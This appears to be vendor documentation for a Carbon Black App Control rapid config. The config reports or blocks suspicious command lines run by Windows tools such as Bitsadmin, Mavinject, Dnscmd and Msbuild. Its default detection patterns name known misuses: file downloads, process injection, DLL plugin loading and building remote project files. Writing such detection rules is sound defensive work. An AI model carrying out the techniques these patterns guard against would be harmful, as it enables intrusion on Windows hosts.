Purpose: To look for suspicious behavior based on unusual command lines.

Description: Reports or prevents behavior by common applications that is suspicious based on command line.

Enabled by Default: No
Platform: Windows
Minimum Agent Version Required: 8.0.0

The Edit Rapid Config for the Suspicious Command Line Protection A-M Rapid Config

Rapid Config Settings

As with most rapid configs, you can:

  • Enable or disable the rapid config.

  • Specify what policies the rapid config applies to.

In addition, you can choose to Do Nothing, Report, or Block the specific items or behaviors.

Note: RECOMMENDATION: We recommend setting each section to Report prior to setting to Block. Use the resulting events to ensure that legitimate behavior will not be impacted.

For each of the following sections, specify what action you require.

Atbroker.exe

Use this group to specify how to handle suspicious Atbroker command lines. Atbroker is part of the Windows Assistive Technology Manager.

The Atbroker.exe settings for the Suspicious Command Line Protection A-M Rapid Config

Report Or Block Execution Of Atbroker With Suspicious Command Lines:
Should execution of Atbroker with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Atbroker Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/start*>Atbroker.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Bitsadmin.exe

Use this group to specify how to handle suspicious Bitsadmin command lines. Bitsadmin is part of the Background Intelligent Transfer Service

The Bitsadmin.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of Bitsadmin With Suspicious Command Lines:
Should execution of Bitsadmin with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Bitsadmin Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list.
  • <cmdline:*/cancel*>Bitsadmin.exe
  • <cmdline:*/complete*>Bitsadmin.exe
  • <cmdline:*/create*>Bitsadmin.exe
  • <cmdline:*/download*>Bitsadmin.exe
  • <cmdline:*/resume*>Bitsadmin.exe
  • <cmdline:*/transfer*>Bitsadmin.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Control.exe

Use this group to specify how to handle suspicious Control command lines. Control.exe runs the Control Panel application.

The Control.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of Control With Suspicious Command Lines:
Should execution of Control with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Control Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*.cpl*>Control.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Cscript.exe

Use this group to specify how to handle suspicious Cscript command lines. Cscript is the Windows Script Host.

The Cscript.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of Cscript With Suspicious Command Lines:
Should execution of Cscript with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Cscript Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • \device\*:*
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Dnscmd.exe

Use this group to specify how to handle suspicious Dnscmd command lines. Dnscmd is a command line tool for managing DNS servers

The Dnscmd.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of Dnscmd With Suspicious Command Lines:
Should execution of Dnscmd with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Dnscmd Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/serverlevelplugindll*>Dnscmd.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Mavinject.exe

Use this group to specify how to handle suspicious Mavinject command lines. Mavinject is part of Microsoft Application Virtualization.

The Mavinject.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of Mavinject With Suspicious Command Lines:
Should execution of Mavinject with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
Mavinject Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*/injectrunning*>Mavinject.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.

Msbuild.exe

Use this group to specify how to handle suspicious Msbuild command lines. Msbuild is the Microsoft Build Engine.

The Msbuild.exe settings for the Suspicious Command Line Protection A-M Rapid Config

*Report Or Block Execution Of MSbuild With Suspicious Command Lines:
Should execution of MSbuild with suspicious command lines be reported or blocked? You should validate that legitimate execution is not blocked before enabling blocking.
MSbuild Command Lines To Report:
Carbon Black App Control will report or block execution of the specified command lines. You can add or remove items from this list. By default, the list includes:
  • <cmdline:*.csproj*>Msbuild.exe
  • <cmdline:*.xml*>Msbuild.exe
  • <cmdline:*http*>Msbuild.exe
Command Lines That Should Not Be Reported:
Execution of command lines specified here will not be reported or blocked.